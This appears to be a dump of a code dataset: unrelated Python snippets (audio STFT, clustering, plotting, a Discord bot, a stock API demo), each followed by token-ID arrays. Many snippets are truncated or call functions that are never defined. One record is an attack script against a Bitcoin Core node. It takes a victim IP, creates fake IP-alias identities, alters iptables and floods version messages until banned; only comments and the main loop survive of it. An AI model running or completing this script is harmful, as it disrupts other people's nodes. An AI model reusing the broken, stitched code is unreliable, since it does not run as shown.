W I = th.eye(window.shape[0], device=win.device)[:, None] # 1 x 1 x T norm = tf.conv_transpose1d(win**2, I, stride=frame_hop, padding=0) if center: pad = kernel.shape[-1] // 2 s = s[..., pad:-pad] norm = norm[..., pad:-pad] s = s / (norm + EPSILON) # N x S s = s.squeeze(1) return s def forward_stft( wav: th.Tensor, frame_len: int, frame_hop: int, output: str = "complex", window: str = "sqrthann", round_pow_of_two: bool = True, pre_emphasis: float = 0, normalized: bool = False, onesided: bool = True, center: bool = False, mode: str = "librosa") -> Union[th.Tensor, Tuple[th.Tensor, th.Tensor]]: """ STFT function implementation, equals to STFT layer Args: wav: source audio signal frame_len: length of the frame frame_hop: hop size between frames output: output type (complex, real, polar) window: window name center: center flag (similar with that in librosa.stft) round_pow_of_two: if true, choose round(#power_of_two) as the FFT size pre_emphasis: factor of preemphasis normalized: use normalized DFT kernel onesided: output onesided STFT inverse: using iDFT kernel (for iSTFT) mode: "kaldi"|"librosa", slight difference on applying window function """ K, _ = init_kernel(frame_len, frame_hop, init_window(window, frame_len), round_pow_of_two=round_pow_of_two, normalized=normalized, inverse=False, mode=mode) return _forward_stft(wav, K.to(wav.device), output=output, frame_hop=frame_hop, pre_emphasis=pre_emphasis, onesided=onesided, center=center) def inverse_stft(transform: Union[th.Tensor, Tuple[th.Tensor, th.Tensor]], frame_len: int, frame_hop: int, input: str = "complex", window: str = "sqrthann", round_pow_of_two: bool = True, normalized: bool = False, onesided: bool = True, center: bool = False, mode: str = "librosa") -> th.Tensor: """ iSTFT function implementation, equals to iSTFT layer Args: transform: results of STFT frame_len: length of the frame frame_hop: hop size between frames input: input format (complex, real, polar) window: window name center: center flag (similar with that in librosa.stft) round_pow_of_two: if true, choose round(#power_of_two) as the FFT size normalized: use normalized DFT kernel onesided: output 
onesided STFT mode: "kaldi"|"librosa", slight difference on applying window function """ if isinstance(transform, th.Tensor): device = transform.device else: device = transform[0].device K, w = init_kernel(frame_len, frame_hop, init_window(window, frame_len), round_pow_of_two=round_pow_of_two, normalized=normalized, inverse=True, mode=mode) return _inverse_stft(transform, K.to(device), w.to(device), input=input, frame_hop=frame_hop, onesided=onesided, center=center)
[ 2, 15069, 13130, 40922, 18027, 198, 2, 13789, 25, 24843, 362, 13, 15, 357, 4023, 1378, 2503, 13, 43073, 13, 2398, 14, 677, 4541, 14, 43, 2149, 24290, 12, 17, 13, 15, 8, 198, 198, 11748, 10688, 198, 198, 11748, 299, 32152, 355, 459...
1.998003
7,510
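For orientation, a round-trip sketch of the two function-style entry points above; the module path in the import is hypothetical (the file containing these helpers is assumed importable):

import torch as th
# "transform_utils" is a hypothetical name for the module above
from transform_utils import forward_stft, inverse_stft

wav = th.randn(4, 16000)  # N x S: four 1-second signals at 16 kHz
# onesided complex STFT: a (real, imag) pair, each N x B x T
real, imag = forward_stft(wav, frame_len=512, frame_hop=256, output="complex")
# and back to N x S' waveforms
rec = inverse_stft((real, imag), frame_len=512, frame_hop=256, input="complex")
print(wav.shape, rec.shape)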
# Copyright 2019 Graphcore Ltd.
from models.resnet_base import ResNet

import tensorflow.compat.v1 as tf
import tensorflow.contrib as contrib
from tensorflow.python.ipu import normalization_ops

# This is all written for: NHWC
[ 2, 15069, 13130, 29681, 7295, 12052, 13, 198, 6738, 4981, 13, 411, 3262, 62, 8692, 1330, 1874, 7934, 198, 198, 11748, 11192, 273, 11125, 13, 5589, 265, 13, 85, 16, 355, 48700, 198, 11748, 11192, 273, 11125, 13, 3642, 822, 355, 542, ...
3.257143
70
# Generated by Django 3.1.4 on 2020-12-05 18:46

from django.db import migrations, models
[ 2, 2980, 515, 416, 37770, 513, 13, 16, 13, 19, 319, 12131, 12, 1065, 12, 2713, 1248, 25, 3510, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 628 ]
2.84375
32
#!/usr/bin/env python3

import time
import os
import tempfile
import shutil
import logging
from enum import Enum
from argparse import ArgumentParser, Namespace, FileType

from netCDF4 import Dataset, MFDataset
import geopandas as gpd
import numpy as np

domain_nodes_shp = "gis/ssm domain nodes.shp"
masked_nodes_txt = "gis/masked nodes.txt"

logger = logging.getLogger(__name__)

DEFAULT_SIGLAYERS = [-0.01581139, -0.06053274, -0.12687974, -0.20864949,
                     -0.30326778, -0.40915567, -0.52520996, -0.65060186,
                     -0.78467834, -0.9269075]


# Gotten from https://stackoverflow.com/questions/312443/how-do-you-split-a-list-or-iterable-into-evenly-sized-chunks
def chunks(lst, n):
    """Yield successive n-sized chunks from lst."""
    for i in range(0, len(lst), n):
        yield lst[i:i + n]


# Vertical extraction modes (reconstructed from attr_strings below; the
# elided original may use different member values)
class InputAttr(Enum):
    ALL = "all"
    BOTTOM = "bottom"


attr_strings = {
    "all": InputAttr.ALL,
    "bottom": InputAttr.BOTTOM
}

# Expands an input variable argument into a variable name and an attribute
# describing the vertical extraction method.

if __name__ == "__main__":
    main()
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 198, 11748, 640, 198, 11748, 28686, 198, 11748, 20218, 7753, 198, 11748, 4423, 346, 198, 11748, 18931, 198, 6738, 33829, 1330, 2039, 388, 198, 6738, 1822, 29572, 1330, 45751, 46677, ...
2.457219
374
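The comment above documents an expansion helper whose body is not in this row; a minimal sketch of such a parser, assuming a `variable[:attribute]` argument syntax (the separator and the default are guesses):

def expand_var_argument(arg: str):
    # "salinity" -> ("salinity", InputAttr.ALL); "salinity:bottom" -> (..., InputAttr.BOTTOM)
    name, _, attr = arg.partition(":")
    return name, attr_strings[attr or "all"]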
from logging import getLogger

from libcity.executor.abstract_tradition_executor import AbstractTraditionExecutor
from libcity.utils import get_evaluator
[ 6738, 18931, 1330, 651, 11187, 1362, 198, 6738, 9195, 19205, 13, 18558, 38409, 13, 397, 8709, 62, 2213, 324, 653, 62, 18558, 38409, 1330, 27741, 2898, 324, 653, 23002, 38409, 198, 6738, 9195, 19205, 13, 26791, 1330, 651, 62, 18206, 84, ...
3.581395
43
# Generated by Django 2.2.5 on 2020-04-08 00:08

from django.db import migrations
[ 2, 2980, 515, 416, 37770, 362, 13, 17, 13, 20, 319, 12131, 12, 3023, 12, 2919, 3571, 25, 2919, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 628 ]
2.766667
30
# Creon Plus API example: the API offers two ways to request data,
# BlockRequest and Request.
#
# BlockRequest - synchronous: the call blocks until the reply arrives
# Request      - asynchronous: the call returns immediately and the reply
#                arrives later through the Received event
#
# Both styles are demonstrated below on the same stock code:
# 1. BlockRequest
# 2. Request, pumping Windows messages until OnReceived fires

import pythoncom
from PyQt5.QtWidgets import *
import win32com.client
import win32event

g_objCodeMgr = win32com.client.Dispatch('CpUtil.CpCodeMgr')

StopEvent = win32event.CreateEvent(None, 0, 0, None)


def MessagePump(timeout):
    waitables = [StopEvent]
    while 1:
        rc = win32event.MsgWaitForMultipleObjects(
            waitables,
            0,  # Wait for all = false, so it waits for anyone
            timeout,  # (or win32event.INFINITE)
            win32event.QS_ALLEVENTS)  # Accepts all input

        if rc == win32event.WAIT_OBJECT_0:
            # Our first event listed, the StopEvent, was triggered, so we must exit
            print('stop event')
            break
        elif rc == win32event.WAIT_OBJECT_0 + len(waitables):
            # A windows message is waiting - take care of it. (Don't ask me
            # why a WAIT_OBJECT_MSG isn't defined < WAIT_OBJECT_0...!).
            # This message-serving MUST be done for COM, DDE, and other
            # Windowsy things to work properly!
            print('pump')
            if pythoncom.PumpWaitingMessages():
                break  # we received a wm_quit message
        elif rc == win32event.WAIT_TIMEOUT:
            print('timeout')
            return
        else:
            print('exception')
            raise RuntimeError("unexpected win32wait return value")


code = 'A005930'

##############################################################
# 1. BlockRequest
print('#####################################')
objStockMst = win32com.client.Dispatch("DsCbo1.StockMst")
objStockMst.SetInputValue(0, code)
objStockMst.BlockRequest()
print('BlockRequest done')
item = {}
item['name'] = g_objCodeMgr.CodeToName(code)
item['price'] = objStockMst.GetHeaderValue(11)  # current price
item['diff'] = objStockMst.GetHeaderValue(12)  # change from previous close
print(item)
print('')

##############################################################
# 2. Request ==> message pump ==> OnReceived
print('#####################################')
objReply = CpCurReply(objStockMst)
objReply.Subscribe()

code = 'A005930'
objStockMst.SetInputValue(0, code)
objStockMst.Request()
MessagePump(10000)

item = {}
item['name'] = g_objCodeMgr.CodeToName(code)
item['price'] = objStockMst.GetHeaderValue(11)  # current price
item['diff'] = objStockMst.GetHeaderValue(12)  # change from previous close
print(item)
[ 2, 220, 7824, 201, 198, 2, 220, 220, 220, 362, 9726, 18453, 220, 19390, 220, 220, 220, 201, 198, 2, 220, 7824, 220, 220, 220, 220, 220, 362, 220, 201, 198, 2, 201, 198, 2, 9726, 18453, 220, 532, 220, 220, 220, 220, 220, 220, 2...
2.210213
1,175
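The script above subscribes through a `CpCurReply` helper whose definition was not included in the row. A minimal sketch of what such a pywin32 event subscriber could look like, assuming its only job is to signal `StopEvent` so `MessagePump` returns (the class layout is a guess, not official Creon SDK code):

import win32com.client
import win32event

class CpEvent:
    # COM event sink: Creon fires Received when the async reply lands.
    def set_params(self, client, name):
        self.client = client
        self.name = name

    def OnReceived(self):
        print(f'{self.name}: reply received')
        win32event.SetEvent(StopEvent)  # releases MessagePump()

class CpCurReply:
    def __init__(self, obj):
        self.obj = obj

    def Subscribe(self):
        handler = win32com.client.WithEvents(self.obj, CpEvent)
        handler.set_params(self.obj, 'StockMst')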
#%%
import numpy as np
import copy
import matplotlib.pyplot as plt
import time


def split_cluster_new(tree, local_density, dc_eps, closest_denser_nodes_id, mixin_near_matrix):
    '''
    Split the density tree into forests using the density-connectivity
    threshold dc_eps:
        outlier_forest   - subtrees treated as outliers
        cluster_forest   - subtrees kept as clusters
        uncertain_forest - subtrees labeled later from their neighbors
    '''
    mean_density = np.mean(local_density)
    outlier_forest = {}
    cluster_forest = {}
    uncertain_forest = {}
    not_direct_reach = []
    #* collect nodes whose closest denser node is not one of their near neighbors
    for k in range(len(closest_denser_nodes_id)):
        near_nodes = mixin_near_matrix[k]
        if closest_denser_nodes_id[k] not in near_nodes:
            not_direct_reach.append(k)
    not_direct_reach = np.array(not_direct_reach)

    # not_direct_reach = np.where(closest_dis_denser>eps)[0]
    #* sort those nodes by their depth in the tree
    # not_direct_reach = np.array(not_direct_reach)
    depth_list_not_direct_reach = np.zeros(len(not_direct_reach), dtype=np.int16)
    for i in range(len(not_direct_reach)):
        # depth_list_not_direct_reach[i] = tree.node_dir[not_direct_reach[i]].getLvl()
        depth_list_not_direct_reach[i] = tree.calcu_depth(not_direct_reach[i], 0)
    not_direct_reach = list(not_direct_reach[np.argsort(depth_list_not_direct_reach)])

    #* process the deepest nodes first
    start = time.perf_counter()  # time.clock() was removed in Python 3.8
    while len(not_direct_reach) > 0:
        node_id = not_direct_reach.pop()
        if node_id == 129193 or node_id == 61589 or node_id == 123593:
            print(node_id)  # debug trace for specific nodes
        if node_id in tree.sorted_gamma_index[0:10]:
            cluster_forest[node_id] = tree.remove_subtree(node_id)
            continue
        node = tree.node_dir[node_id]
        parent_id = node.parent_id
        parent_node = tree.node_dir[parent_id]
        children = parent_node.getChildren()
        siblings_reliable = [i for i in children if i not in not_direct_reach]
        not_reliable_nodes = [i for i in children if i not in siblings_reliable]
        if node_id in not_reliable_nodes:
            not_reliable_nodes.remove(node_id)
        if node_id in siblings_reliable:
            siblings_reliable.remove(node_id)
        pairs_nodes = is_connected_new(tree, local_density, dc_eps, node_id,
                                       siblings_reliable, not_reliable_nodes,
                                       mixin_near_matrix)
        if len(pairs_nodes) == 0:
            if node_id == tree.root_node.node_id:
                continue
            if (local_density[node_id] - mean_density * dc_eps) >= 0:
                #* dense node: keep as cluster or defer, depending on subtree size
                offspring_id = tree.get_subtree_offspring_id(node_id, [node_id])
                if len(offspring_id) < local_density[node_id]:
                    uncertain_forest[node_id] = tree.remove_subtree(node_id)
                else:
                    cluster_forest[node_id] = tree.remove_subtree(node_id)
            else:
                outlier_forest[node_id] = tree.remove_subtree(node_id)
    end = time.perf_counter()
    print('elapsed: %s' % str(end - start))
    cluster_forest[tree.root_node.node_id] = tree  #* the remaining tree is itself a cluster
    return outlier_forest, cluster_forest, uncertain_forest


def is_connected_new(tree, local_density, dc_eps, cur_node_id, reliable_nodes,
                     not_reliable_nodes, mixin_near_matrix):
    '''
    Decide whether cur_node is density-connected to the cluster formed by
    reliable_nodes, possibly through not_reliable_nodes:
    1. test cur_node against each reliable node directly
    2. otherwise try to reach them through not_reliable_nodes ([a,b,c,d,e]
       is explored as splits such as [a,b,c] / [d,e])
    3. e.g. for [a,b,c]: recurse with cur_node_id=a, the same reliable_nodes,
       and not_reliable_nodes=[b,c,d,e]
    '''
    #* 1. direct connection to a reliable sibling
    if len(reliable_nodes) == 0:
        return []
    for reliable_node_id in reliable_nodes:
        pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(
            cur_node_id, reliable_node_id, mixin_near_matrix)
        if len(pairs_nodes) == 0:
            continue
        # return pairs_nodes
        cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id, [cur_node_id])
        local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
        local_density_connected_nodes = np.mean(local_density[connected_nodes])
        if local_density_connected_nodes > local_density_cur_offspring * dc_eps:
            return pairs_nodes

    #* 2. connection through a not-yet-reliable sibling
    if len(not_reliable_nodes) == 0:  # guard: the fall-through below needs a loop pass
        return []
    for i in range(len(not_reliable_nodes)):
        pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(
            cur_node_id, not_reliable_nodes[i], mixin_near_matrix)
        if len(pairs_nodes) == 0:
            pairs_nodes = is_connected_new(tree, local_density, dc_eps,
                                           not_reliable_nodes[i], reliable_nodes,
                                           not_reliable_nodes[i + 1:], mixin_near_matrix)
            if len(pairs_nodes) > 0:
                return pairs_nodes
        else:
            cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id, [cur_node_id])
            local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
            local_density_connected_nodes = np.mean(local_density[connected_nodes])
            if local_density_connected_nodes > local_density_cur_offspring * dc_eps:
                return pairs_nodes
            # return pairs_nodes

    #* fall through using the last loop iteration's values
    cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id, [cur_node_id])
    local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
    local_density_connected_nodes = np.mean(local_density[connected_nodes])
    if local_density_connected_nodes > local_density_cur_offspring * dc_eps:
        return pairs_nodes
    if len(pairs_nodes) == 0:
        pairs_nodes = is_connected_new(tree, local_density, dc_eps,
                                       not_reliable_nodes[i], reliable_nodes,
                                       not_reliable_nodes[i + 1:], mixin_near_matrix)
        if len(pairs_nodes) > 0:
            return pairs_nodes
    return []


def label_these_node_new(outlier_forest, cluster_forest, node_num, uncertain_forest, mixin_near_matrix):
    '''
    Assign a label to every node from the forests produced by split_cluster_new.
    '''
    labels = np.full((node_num), -1, dtype=np.int32)
    for outlier_id in outlier_forest:
        outlier_tree = outlier_forest[outlier_id]
        outlier_idlist = outlier_tree.get_subtree_offspring_id(outlier_id, [outlier_id])
        labels[outlier_idlist] = -1

    label = 0
    for tree_id in cluster_forest:
        cluster_tree = cluster_forest[tree_id]
        cluster_idlist = cluster_tree.get_subtree_offspring_id(tree_id, [tree_id])
        labels[cluster_idlist] = label
        label = label + 1

    #todo uncertain subtrees take the majority label of their labeled neighbors
    for uncertain_tree_id in uncertain_forest:
        uncertain_tree = uncertain_forest[uncertain_tree_id]
        uncertain_nodes_id = uncertain_tree.get_subtree_offspring_id(uncertain_tree_id, [uncertain_tree_id])
        all_near_nodes = np.array([], dtype=np.int32)
        for node_id in uncertain_nodes_id:
            all_near_nodes = np.append(all_near_nodes, mixin_near_matrix[node_id])
        # all_near_nodes = mixin_near_matrix[uncertain_nodes_id]
        all_near_nodes = np.unique(all_near_nodes)
        all_near_nodes = all_near_nodes[np.where(labels[all_near_nodes] != -1)]
        unique_labels, counts = np.unique(labels[all_near_nodes], return_counts=True)
        if len(counts) == 0:
            cur_label = -1
        else:
            cur_label = unique_labels[np.argmax(counts)]
        labels[uncertain_nodes_id] = cur_label

    core_points = cluster_forest.keys()
    return labels, core_points


'''
CFSFDP-style clustering utilities built on DPTree
'''
[ 2, 16626, 198, 11748, 299, 32152, 355, 45941, 198, 11748, 4866, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 11748, 640, 220, 198, 198, 4299, 6626, 62, 565, 5819, 62, 3605, 7, 21048, 11, 12001, 62, 43337, 11, 1...
2.034141
3,632
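The splitting code above consumes a precomputed `local_density` array, the density-peaks (CFSFDP) density. A minimal sketch of one standard way to compute it with a Gaussian kernel; the cutoff distance `dc` is problem-specific:

import numpy as np

def gaussian_local_density(points: np.ndarray, dc: float) -> np.ndarray:
    # rho_i = sum_{j != i} exp(-(d_ij / dc)^2), the usual CFSFDP density
    diff = points[:, None, :] - points[None, :, :]
    dist = np.sqrt((diff ** 2).sum(axis=-1))
    return np.exp(-(dist / dc) ** 2).sum(axis=1) - 1.0  # subtract the self-term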
from __future__ import print_function

import sys
sys.path.append('.')

import os
from typing import Optional, Union

import cv2
import numpy as np
import PIL.Image as Image
import pickle
import torch
from torch.utils import data

__all__ = ["TAO"]
[ 6738, 11593, 37443, 834, 1330, 3601, 62, 8818, 198, 11748, 25064, 198, 17597, 13, 6978, 13, 33295, 10786, 2637, 8, 198, 11748, 28686, 198, 6738, 19720, 1330, 32233, 11, 4479, 198, 198, 11748, 269, 85, 17, 198, 11748, 299, 32152, 355, ...
3.293333
75
from typing import TYPE_CHECKING
if TYPE_CHECKING:
    from Platforms.Web.main_web import PhaazebotWeb

import json
from aiohttp.web import Response
from Utils.Classes.extendedrequest import ExtendedRequest
[ 6738, 19720, 1330, 41876, 62, 50084, 2751, 198, 361, 41876, 62, 50084, 2751, 25, 198, 197, 6738, 19193, 82, 13, 13908, 13, 12417, 62, 12384, 1330, 1380, 64, 1031, 1765, 313, 13908, 198, 198, 11748, 33918, 198, 6738, 257, 952, 4023, 13...
3.4
60
import torch
import torch.nn as nn
[ 11748, 28034, 198, 11748, 28034, 13, 20471, 355, 299, 77, 628, 198 ]
3.083333
12
""" Module for plotting analyses """ import matplotlib as mpl import matplotlib.pyplot as plt import numpy as np from copy import deepcopy import pickle, json import os from matplotlib.offsetbox import AnchoredOffsetbox try: basestring except NameError: basestring = str colorList = [[0.42, 0.67, 0.84], [0.90, 0.76, 0.00], [0.42, 0.83, 0.59], [0.90, 0.32, 0.00], [0.34, 0.67, 0.67], [0.90, 0.59, 0.00], [0.42, 0.82, 0.83], [1.00, 0.85, 0.00], [0.33, 0.67, 0.47], [1.00, 0.38, 0.60], [0.57, 0.67, 0.33], [0.50, 0.20, 0.00], [0.71, 0.82, 0.41], [0.00, 0.20, 0.50], [0.70, 0.32, 0.10]] * 3 def add_scalebar(axis, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs): """ Add scalebars to axes Adds a set of scale bars to *ax*, matching the size to the ticks of the plot and optionally hiding the x and y axes - axis : the axis to attach ticks to - matchx,matchy : if True, set size of scale bars to spacing between ticks, if False, set size using sizex and sizey params - hidex,hidey : if True, hide x-axis and y-axis of parent - **kwargs : additional arguments passed to AnchoredScaleBars Returns created scalebar object """ if matchx: sizex = get_tick_size(axis.xaxis) if matchy: sizey = get_tick_size(axis.yaxis) if 'sizex' in kwargs: sizex = kwargs['sizex'] if 'sizey' in kwargs: sizey = kwargs['sizey'] if ymax is not None and sizey>ymax: sizey = autosize(sizey, ymax, scaley) if xmax is not None and sizex>xmax: sizex = autosize(sizex, xmax, scalex) kwargs['sizex'] = sizex kwargs['sizey'] = sizey if unitsx is None: unitsx = '' if unitsy is None: unitsy = '' if 'labelx' not in kwargs or kwargs['labelx'] is None: kwargs['labelx'] = '%.3g %s'%(kwargs['sizex'] * scalex, unitsx) if 'labely' not in kwargs or kwargs['labely'] is None: kwargs['labely'] = '%.3g %s'%(kwargs['sizey'] * scaley, unitsy) # add space for scalebar if space is not None: ylim0, ylim1 = axis.get_ylim() ylim = (ylim0 - space, ylim1) if ylim0 > ylim1: # if y axis is inverted ylim = (ylim0 + space, ylim1) axis.set_ylim(ylim) scalebar = AnchoredScaleBar(axis, **kwargs) axis.add_artist(scalebar) if hidex: axis.xaxis.set_visible(False) if hidey: axis.yaxis.set_visible(False) if hidex and hidey: axis.set_frame_on(False) return scalebar
[ 37811, 198, 26796, 329, 29353, 13523, 198, 198, 37811, 198, 198, 11748, 2603, 29487, 8019, 355, 285, 489, 198, 11748, 2603, 29487, 8019, 13, 9078, 29487, 355, 458, 83, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 4866, 1330, 2769, 300...
2.156352
1,228
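A usage sketch for `add_scalebar`; it assumes the helpers the function references (`get_tick_size`, `autosize`, `AnchoredScaleBar`) are defined elsewhere in the module, as in the full source this row was cut from:

import numpy as np
import matplotlib.pyplot as plt

fig, ax = plt.subplots()
ax.plot(np.linspace(0, 100, 500), np.sin(np.linspace(0, 10, 500)))
# bars sized from the tick spacing, axes hidden, labels in ms / mV
add_scalebar(ax, unitsx='ms', unitsy='mV')
plt.show()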
from mo_parsing.helpers import QuotedString

wikiInput = """
Here is a simple Wiki input:
*This is in italics.*
**This is in bold!**
***This is in bold italics!***
Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}}
"""

italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>"))
bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>"))
boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>"))
urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A)

wikiMarkup = urlRef | boldItalicized | bolded | italicized
[ 6738, 6941, 62, 79, 945, 278, 13, 16794, 364, 1330, 2264, 5191, 10100, 201, 198, 201, 198, 15466, 20560, 796, 37227, 201, 198, 4342, 318, 257, 2829, 13078, 5128, 25, 201, 198, 220, 1635, 1212, 318, 287, 46127, 873, 15885, 201, 198, ...
2.496296
270
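`convertToHTML` and `convertToHTML_A` are not included in the row; a sketch with the shapes the call sites imply, plus a transform call. The snake_case `transform_string` method mirrors pyparsing's `transformString` and is an assumption about the mo_parsing API:

def convertToHTML(opening, closing):
    # Parse-action factory: wrap the matched body in the given tags.
    def to_html(tokens):
        return opening + tokens[0] + closing
    return to_html

def convertToHTML_A(tokens):
    # "{{text->url}}" becomes an HTML anchor.
    text, url = tokens[0].split("->")
    return f'<A href="{url}">{text}</A>'

print(wikiMarkup.transform_string(wikiInput))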
import pytest
import re
from typing import Any, Tuple
from dataclasses import dataclass

from app_settings_dict import Settings
[ 11748, 12972, 9288, 198, 11748, 302, 198, 6738, 19720, 1330, 4377, 11, 309, 29291, 198, 6738, 4818, 330, 28958, 1330, 4818, 330, 31172, 198, 6738, 598, 62, 33692, 62, 11600, 1330, 16163, 628, 628, 628, 628, 628, 628, 628, 628 ]
3.55
40
import os
import time

import cv2
import sys
sys.path.append('..')
import numpy as np
from math import cos, sin

from lib.FSANET_model import *

from keras.layers import Average


if __name__ == '__main__':
    main()
[ 11748, 28686, 198, 11748, 640, 198, 198, 11748, 269, 85, 17, 198, 11748, 25064, 198, 17597, 13, 6978, 13, 33295, 10786, 492, 11537, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 10688, 1330, 8615, 11, 7813, 198, 198, 6738, 9195, 13, ...
2.711111
90
import discord
from discord.commands import option

bot = discord.Bot(debug_guilds=[...])

COLORS = ["red", "orange", "yellow", "green", "blue", "indigo", "violet"]
LOTS_OF_COLORS = [
    "aliceblue", "antiquewhite", "aqua", "aquamarine", "azure",
    "beige", "bisque", "blueviolet", "brown", "burlywood",
    "cadetblue", "cornflowerblue", "cornsilk", "crimson", "cyan",
    "darkblue", "deepskyblue", "dimgray", "dimgrey", "dodgerblue",
    "firebrick", "floralwhite", "forestgreen", "fuchsia", "gainsboro",
    "ghostwhite", "gold", "goldenrod", "gray", "green",
    "greenyellow", "grey", "honeydew", "hotpink", "indianred",
    "indigo", "ivory", "khaki", "lavender", "lavenderblush",
    "lawngreen", "lightcoral", "maroon", "mediumaquamarine", "mediumblue",
    "mediumorchid", "midnightblue", "navajowhite", "navy", "oldlace",
    "olive", "olivedrab", "orange", "orangered", "orchid",
    "palegoldenrod", "palegreen", "plum", "powderblue", "purple",
    "red", "rosybrown", "royalblue", "saddlebrown", "sienna",
    "springgreen", "steelblue", "tan", "teal", "thistle",
    "tomato", "turquoise", "violet", "wheat", "white",
    "whitesmoke", "yellow", "yellowgreen",
]

BASIC_ALLOWED = [...]  # This would normally be a list of discord user IDs for the purpose of this example

bot.run("TOKEN")
[ 11748, 36446, 198, 6738, 36446, 13, 9503, 1746, 1330, 3038, 198, 198, 13645, 796, 36446, 13, 20630, 7, 24442, 62, 70, 3547, 82, 41888, 986, 12962, 198, 198, 25154, 20673, 796, 14631, 445, 1600, 366, 43745, 1600, 366, 36022, 1600, 366, ...
2.031209
769
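The slash-command definitions were elided from this row; a sketch of one command in the Pycord style the imports suggest, using `COLORS` as static choices (the decorator keywords are assumptions based on Pycord's `option` helper):

@bot.slash_command(name="color")
@option("color", description="Pick a color!", choices=COLORS)
async def pick_color(ctx, color: str):
    await ctx.respond(f"You picked {color}!")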
from _thread import start_new_thread
from bitcoin.messages import *
from bitcoin.net import CAddress
from bitcoin.core import CBlock
from io import BytesIO as _BytesIO

import atexit
import bitcoin
import fcntl
import hashlib
import json
import os
import random
import re
import socket
import struct
import sys
import time
import datetime

if os.geteuid() != 0:
    sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n")

# Specify the attacker's genuine IP
attacker_ip = input('\nEnter attacker\'s IP address: ')

# Specify the victim's IP, and port (8333 for Bitcoin)
victim_ip = input('Enter victim\'s IP address: ')
victim_port = 8333

# How many identities should run simultaneously
num_identities = 8

# While attacking the victim, wait this many seconds before sending each version message
seconds_between_version_packets = 0.1

identity_interface = []  # Keeps the IP alias interface and IP for each successful connection
identity_address = []  # Keeps the IP and port for each successful connection
identity_socket = []  # Keeps the socket for each successful connection

# The file where the iptables backup is saved, then restored when the script ends
iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules'

# Send commands to the Linux terminal

# Send commands to the Bitcoin Core Console

# Generate a random identity using the broadcast address template

# Checking the internet by sending a single ping to Google
#def internet_is_active():
#    return os.system('ping -c 1 google.com') == 0

# If all else fails, we can use this to recover the network
#def reset_network():
#    print('Resetting network...')
#    terminal(f'sudo ifconfig {network_interface} {attacker_ip} down')
#    terminal(f'sudo ifconfig {network_interface} {attacker_ip} up')

# Create an alias for a specified identity

# Construct a block packet using python-bitcoinlib

# Construct a version packet using python-bitcoinlib

# Close a connection

# Creates a fake connection to the victim

# Send version repeatedly, until banned

# Initialize the network

# Initialize Bitcoin info

# Save a backup of the iptables rules

# Restore the backup of the iptables rules

# Remove all ip aliases that were created by the script

# This function is run when the script is stopped

# This is the first code to run
if __name__ == '__main__':
    global alias_num
    alias_num = 0  # Increments each alias

    initialize_network_info()
    initialize_bitcoin_info()

    atexit.register(on_close)  # Make on_close() run when the script terminates
    cleanup_iptables()  # Restore any pre-existing iptables before backing up, just in case if the computer shutdown without restoring
    backup_iptables()

    # Create the connections
    for i in range(1, num_identities + 1):
        try:
            make_fake_connection(src_ip=random_ip(), dst_ip=victim_ip)
        except ConnectionRefusedError:
            print('Connection was refused. The victim\'s node must not be running.')

    print(f'Successful connections: {len(identity_address)}\n')

    # Prevent the script from terminating when the sniff function is still active
    while 1:
        time.sleep(60)
[ 6738, 4808, 16663, 1330, 923, 62, 3605, 62, 16663, 198, 6738, 8550, 13, 37348, 1095, 1330, 1635, 198, 6738, 8550, 13, 3262, 1330, 327, 20231, 198, 6738, 8550, 13, 7295, 1330, 327, 12235, 198, 6738, 33245, 1330, 2750, 4879, 9399, 355, ...
3.512792
899
#!python3

'''
author: justZero
email: alonezero@foxmail.com
date: 2017-8-6
'''

import time
import pandas as pd
import numpy as np
import pymysql
import pymysql.cursors
import pprint


if __name__ == '__main__':

    inputFile = 'data/douban_movie_clean.txt'
    movies_df = pd.read_csv(inputFile, sep='^')
    movies = np.array(movies_df).tolist()

    db = MySQLdb()
    try:
        db.insert_movie(movies)
    except Exception as e:
        raise e
    finally:
        db.close()
[ 2, 0, 29412, 18, 198, 198, 7061, 6, 628, 198, 9800, 25, 655, 28667, 198, 12888, 25, 3436, 22570, 31, 12792, 4529, 13, 785, 198, 4475, 25, 2177, 12, 23, 12, 21, 198, 7061, 6, 198, 198, 11748, 640, 198, 11748, 19798, 292, 355, 279...
2.231818
220
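The `MySQLdb` wrapper the script instantiates is not shown; a minimal sketch with the two methods used, built on the imported pymysql. Credentials, database name, and the column count in the INSERT are placeholders:

class MySQLdb(object):
    def __init__(self):
        self.conn = pymysql.connect(host='localhost', user='root',
                                    password='', db='douban',
                                    charset='utf8mb4')

    def insert_movie(self, movies):
        # one %s per column of douban_movie_clean.txt (the count is a guess)
        sql = 'INSERT INTO movie VALUES (%s, %s, %s, %s, %s)'
        with self.conn.cursor() as cursor:
            cursor.executemany(sql, movies)
        self.conn.commit()

    def close(self):
        self.conn.close()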
import ezff
from ezff.interfaces import gulp, qchem

# Define ground truths
gt_gs = qchem.read_structure('ground_truths/optCHOSx.out')
gt_gs_energy = qchem.read_energy('ground_truths/optCHOSx.out')
gt_scan = qchem.read_structure('ground_truths/scanCHOSx.out')
gt_scan_energy = qchem.read_energy('ground_truths/scanCHOSx.out')

# Read template and variable ranges
bounds = ezff.read_variable_bounds('variable_bounds', verbose=False)
template = ezff.read_forcefield_template('template')

